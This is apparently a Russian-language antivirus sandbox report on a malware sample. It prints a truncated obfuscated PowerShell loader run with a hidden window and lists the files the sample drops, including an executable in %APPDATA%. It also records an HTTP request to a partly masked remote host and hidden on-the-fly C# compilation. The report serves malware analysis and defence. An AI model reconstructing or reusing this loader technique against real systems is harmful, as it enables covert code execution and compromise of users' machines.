Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function l78c9a6 { param($s794c7) $g8fe4af = 'h386f3';$sb99b6e = ''; for ($i = 0; $i -lt $s794c7.length; $i+=2) { $zdaaad = [convert]::ToByte($s794c7.Substring($i, 2),...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\r7e_sua9.0.cs
- %TEMP%\r7e_sua9.cmdline
- %TEMP%\r7e_sua9.out
- %TEMP%\csc6405.tmp
- %TEMP%\res6406.tmp
- %TEMP%\r7e_sua9.dll
- %APPDATA%\pf7f3fe.exe
Удаляет следующие файлы
- %TEMP%\res6406.tmp
- %TEMP%\csc6405.tmp
- %TEMP%\r7e_sua9.0.cs
- %TEMP%\r7e_sua9.cmdline
- %TEMP%\r7e_sua9.dll
- %TEMP%\r7e_sua9.out
- %TEMP%\r7e_sua9.pdb
Сетевая активность
TCP
Запросы HTTP GET
- http://we#.###erit.com:8000/ajp/public/0251e9e6dd2b6761318cf74b9c7cfbcc.php
UDP
- DNS ASK we#.#iderit.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\r7e_sua9.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6406.tmp" "%TEMP%\CSC6405.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\r7e_sua9.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6406.tmp" "%TEMP%\CSC6405.tmp"
